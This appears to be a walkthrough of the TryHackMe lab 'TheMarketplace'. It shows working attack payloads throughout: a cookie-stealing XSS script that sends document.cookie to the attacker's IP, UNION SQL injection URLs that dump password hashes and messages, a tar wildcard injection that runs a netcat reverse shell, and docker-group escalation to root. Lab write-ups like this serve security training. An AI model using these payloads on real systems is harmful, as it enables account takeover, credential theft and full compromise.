# CTF TryHackMe - TheMarketplace

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.7.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-26 16:45 CEST
Nmap scan report for 10.10.7.174
Host is up (0.050s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
|   256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_  256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp open  http    nginx 1.19.2
|_http-title: The Marketplace
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-server-header: nginx/1.19.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds
```

There are 2 ports open :

* 22 SSH
* 80 HTTP

## Inspect Website

2 usernames 

* michael
* jake

Created an account, once logged i got a cookie

```
token : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjUsInVzZXJuYW1lIjoiZ3JpYiIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjUwOTg0Nzc0fQ.DZYjU0y7-DwaIW-LMotD8LQrJHwj7IS9n5SlYEdp5HY
```

Go to jwt decode to see the payload

```
{
  "userId": 5,
  "username": "grib",
  "admin": false,
  "iat": 1650984774
}
```

But he has a signature, so we cant modify it easily :(

## Discovered XSS 

I found an XSS in New Listing inside the description field

Try XSS attack :

When created new listing i put this line in the description field :

```
<script src="http://10.9.188.66:8000/java.js"></script>
```

On my kali i started a web server. when i published i didn't get a hit but when i reported listing to admin i got a hit from the victim

```
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.9.188.66 - - [26/Apr/2022 18:46:27] "GET /test.txt HTTP/1.1" 200 -
10.9.188.66 - - [26/Apr/2022 18:46:27] "GET /test.txt HTTP/1.1" 200 -



10.9.188.66 - - [26/Apr/2022 18:47:00] "GET /test.txt HTTP/1.1" 200 -
10.10.7.174 - - [26/Apr/2022 18:47:06] "GET /test.txt HTTP/1.1" 200 -
```

So, we can see when we click on Report listing to admins, a request from the target is made.

## Steel Cookie with XSS

Now go to steel admin cookies!

Create a new listing, and placed the payload is the description field

```
<script>var i=new Image;i.src="http://10.9.188.66:8888/?"+document.cookie;</script>
```

Start a nc listener, and click to report listing to admins

```bash
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.131.33] 59462
GET /?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTE1OTU1MjB9.F1LKNmrYSXLvxg_yl28n0_KB1pkBoQO3PbXlnBEQOV8 HTTP/1.1
Host: 10.9.188.66:8888
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/85.0.4182.0 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://localhost:3000/item/10
Accept-Encoding: gzip, deflate
Accept-Language: en-US
```

Replace our cookie by the admin cookie and refresh the page

Yeaaaah we have now access to the Administration panel!

## Discovered an SQL Injection on Administration Panel

When go to **http://10.10.158.159/admin?user=2**

We can try an sql injection like :

```
http://10.10.158.159/admin?user='
```

Oh, yeah we got a response from MySQL

```
Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
```

## Exploit SQL Injection

Now we need to find the number of columns

Do to this i start by this request

```
http://10.10.158.159/admin?user=2 union select NULL
```

I got 

```
Error: ER_WRONG_NUMBER_OF_COLUMNS_IN_SELECT: The used SELECT statements have a different number of columns
```

So just add another NULL until the previous MySQL error get out

I don't get error with 4 NULL request

```
http://10.10.158.159/admin?user=2 union select NULL, NULL, NULL, NULL
```

We can confirm with the number of NULL

```
http://10.10.158.159/admin?user=2 union select 1,2,3,4
```

So we can test to display MySQL Version (the negative sign this mandoary)

```
http://10.10.158.159/admin?user=-2 union select 1,@@version,database(),4
```
The response is :

```
User 8.0.21
ID: 1
Is administrator: true 
```

It's the second column which is vulnerable

Let's display the name of the database

```
http://10.10.158.159/admin?user=-2 union select 1,database(),3,4
```

The response is :

```
User marketplace
ID: 1
Is administrator: true 
```

Extracting tables from the database

```
http://10.10.158.159/admin?user=-2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() --
```

We got this :

```
User items,messages,users
ID: 1
Is administrator: true 
```

We have 3 tables

* items
* messages
* users


Extracting columns from the tables

```
http://10.10.158.159/admin?user=-2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() --
```
We got this :

```
User id,author,title,description,image,id,user_from,user_to,message_content,is_read,id,username,password,isAdministrator
ID: 1
Is administrator: true 
```

It seems we have

**items table**
* id
* author
* title
* description
* image

**messages table**
* id
* user_from
* user_to
* message_content
* is_read

**users table**
* id
* username
* password
* isAdministrator

Now let's dump username and password

```
http://10.10.158.159/admin?user=-2 UNION SELECT 1,GROUP_CONCAT(username,password),3,4 FROM users --
```
The response is :

```
User system$2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW,michael$2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q,jake$2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG,grib$2b$10$Cs92ft5sp.rR/gTcQb2v/ek9GxlWrN0fyS9jh8n4PI3xYzorTJbES
ID: 1
Is administrator: true 
```

So we have now these creds

| User | Hash |
| ---- | ---- |
| system | $2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW |
| michael | $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q |
|jake | $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG |
| grib | $2b$10$Cs92ft5sp.rR/gTcQb2v/ek9GxlWrN0fyS9jh8n4PI3xYzorTJbES |


Using hashcat to try to crack these hash

```bash
hashcat -m 3200 jake.hash /usr/share/wordlists/rockyou.txt
```

But take a very long time...

So tried to read message content

```
http://10.10.242.182/admin?user=-2 UNION SELECT 1,GROUP_CONCAT(user_to,message_content),3,4 FROM messages --
```

And i got 

```
User 3Hello! An automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password. Your new password is: @b_ENXkGYUCAv3zJ,4Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,4Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.
```

We got jake's SSH password : **@b_ENXkGYUCAv3zJ**

## SSH Access as Jake

We are in !

```bash
jake@the-marketplace:~$ id    
uid=1000(jake) gid=1000(jake) groups=1000(jake)
```

List our sudo permissions

```bash
jake@the-marketplace:/opt$ sudo -l
Matching Defaults entries for jake on the-marketplace:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on the-marketplace:
    (michael) NOPASSWD: /opt/backups/backup.sh
```

What's on backup.sh

```bash
jake@the-marketplace:~$ cat /opt/backups/backup.sh 
#!/bin/bash
echo "Backing up files...";
tar cf /opt/backups/backup.tar *
```

We can try to exploit the tar wilcard

```bash
jake@the-marketplace:/opt/backups$ echo "mkfifo /tmp/lhennp; nc 10.9.188.66 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
jake@the-marketplace:/opt/backups$ echo "" > "--checkpoint-action=exec=sh shell.sh"
jake@the-marketplace:/opt/backups$ echo "" > --checkpoint=1
jake@the-marketplace:/opt/backups$ sudo -u michael /opt/backups/backup.sh
```

Then execute the script 

```bash
jake@the-marketplace:/opt/backups$ sudo -u michael /opt/backups/backup.sh
```

And we are michael

```bash
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.242.182] 45398
id
uid=1002(michael) gid=1002(michael) groups=1002(michael),999(docker)
```

## Privilege escalation to get Root

We can see michael is part of docker group. Let's exploit this way

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# 
```

And we are root ! :D
